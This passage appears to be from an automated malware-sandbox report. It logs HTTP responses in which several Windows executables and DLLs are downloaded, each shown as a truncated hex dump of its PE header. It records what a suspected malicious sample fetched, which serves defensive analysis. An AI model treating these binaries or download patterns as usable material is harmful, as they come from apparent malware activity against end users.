72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 04:53:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 11 Aug 2022 04:50:05 GMTETag: "7ac00-5e5efe634a121"Accept-Ranges: bytesContent-Length: 502784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 92 05 00 00 16 02 00 00 00 00 00 4c a0 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 7e 21 00 00 00 a0 06 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 f0 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 91 05 00 00 10 00 00 00 92 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 68 12 00 00 00 b0 05 00 00 14 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 4d 0c 00 00 00 d0 05 00 00 00 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 7e 21 00 00 00 e0 05 00 00 22 00 00 00 aa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 cc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 f0 6b 00 00 00 30 06 00 00 6c 00 00 00 ce 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 72 01 00 00 a0 06 00 00 72 01 00 00 3a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 00 00 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:01 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:04 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:05 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:05 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:06 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:54:09 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 